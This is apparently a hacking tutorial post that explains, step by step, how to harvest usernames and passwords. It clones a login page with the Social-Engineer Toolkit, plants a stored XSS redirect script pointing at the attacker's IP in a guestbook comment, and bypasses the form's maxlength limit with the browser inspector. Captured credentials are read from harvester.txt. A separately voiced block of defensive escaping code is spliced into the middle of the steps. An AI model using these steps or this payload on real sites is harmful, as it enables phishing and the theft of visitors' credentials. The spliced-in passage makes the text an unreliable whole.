HACKINGS | Cross Site Scripting XSS-4 (hack username and password). LOMBOX
XSS video tutorial
Steps and instructions -
Yo
In this tutorial we will hack username and password with setoolkit from a target website using redirected XSS.
In the previous tutorial I have shown you guys in brief. But today we will conduct a full pen test.
Some terminologies -
XSS - Cross Site Scripting is the injection of malicious script into a website so that it runs in the browsers of the site's visitors.
Website cloning - Making the exact same duplicate website.
Setoolkit - The Social-Engineer Toolkit (SET), a set of social engineering attack tools.
Requirements -
* Firefox browser
* A target website to practice the test
Steps -
* Open a terminal and type "setoolkit" to make a cloned website
You will get the Setoolkit console.
* Choose social engineering attack by typing 1
* Choose website attack vectors by typing 2
* Choose 3 as we are harvesting the credentials
* Now we choose site cloner as we want to clone our target. Type 2
You will get a screen like this
* Setoolkit is asking for your IP address to make a fake website
Type in ifconfig in a new terminal to know your IP address and enter that IP in the Set console
Then it will ask us for which website it should clone.
I have a lab running called DVWA which will be my target website today.
* Copy the target url and paste it
This is the target website
After entering the URL, SET will start cloning and will ask you to run the Apache server. Say "y", i.e. yes.
The cloning process is done.
* Now we want to insert our malicious code to do XSS. This will be a redirect XSS.
I will insert my code in the sign book. You can add the code anywhere, like a comment box or a search tab.
This is my insert section, i.e. the sign book
Add the code in the comment box -
<script>window.location="http://192.168.80.131/"</script>
Here,
<script> - to start the script
window.location - is to redirect
192.168.80.131 - your IP address which you had given in setoolkit
</script> - to close the script
Add this exact code in the message tab or comment tab of your target website
As I was adding my code, it won't let me add more than 50 characters.
The limit is 50 characters in the comment box.
Some websites restrict the user to a 50-character limit.
We have to bypass this now.
I will right click in the comment tab, and you will get the option to "inspect element"
After clicking on "inspect element" you will get some code in the sidebar like this.
And as you can see, here it says maxlength="50"
We will change it to maxlength="100"
Then after hitting enter you can add 100 characters in the comment tab.
This is rare. But it is found on some websites.
There is an alternate method to bypass this, using Burp Suite. We can intercept the packets and requests.
I have made a separate tutorial on it. You can find it here
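On the defending side, both points above (a script stored through a comment field, and a maxlength that exists only in the browser) are handled on the server. The following is an added example, not code from this tutorial or from DVWA: it enforces the length limit server-side and HTML-encodes entries on output. The function names and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example (hypothetical names): server-side handling of a guestbook entry.
const MAX_MESSAGE_LENGTH = 50; // same limit the form's maxlength attribute advertises

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the characters that are significant in HTML text and attribute contexts.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Validate on the server: the browser's maxlength is only a hint and can be edited away.
function validateMessage(message) {
  if (typeof message !== 'string') return { ok: false, reason: 'not-a-string' };
  const length = Array.from(message).length; // count code points, not UTF-16 units
  if (length === 0) return { ok: false, reason: 'empty' };
  if (length > MAX_MESSAGE_LENGTH) return { ok: false, reason: 'too-long' };
  return { ok: true };
}

// Render a stored entry. Encoding at output time is what makes markup inert;
// the length check alone would still let short markup through.
function renderEntry(name, message) {
  return `<div class="entry"><b>${escapeHtml(name)}</b>: ${escapeHtml(message)}</div>`;
}

// Constructed sample inputs: the 57-character redirect string from this page,
// and a short piece of markup that fits inside the 50-character limit.
const redirectPayload = '<script>window.location="http://192.168.80.131/"</script>';
const shortMarkup = '<script>/*x*/</script>';

function demo() {
  return {
    longResult: validateMessage(redirectPayload), // rejected by the server
    shortResult: validateMessage(shortMarkup),    // passes the length check...
    rendered: renderEntry('guest', shortMarkup),  // ...but is displayed as text
  };
}

console.log(demo());
```

A Content-Security-Policy that disallows inline scripts adds a second layer if an encoding step is ever missed.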
Moving on...
Enter the complete script
* When we hit enter, we will be redirected to our cloned website with our IP address.
Now,
When a user of this website visits and tries to access the website, he will be redirected to our fake duplicate server site.
When he enters the username and password, like I did
Username - hacking
Password - monks
The password will be saved in the setoolkit folder.
To access the file containing username and password, browse through - computer/var/www/html
Here in this folder you will get the harvester.txt file.
Open that file
Boom baby
That's it for this tutorial guys.
If you have missed the XSS basics, catch them here and here and here
See you guys in the next hack.
But, until then "Have a safe hack"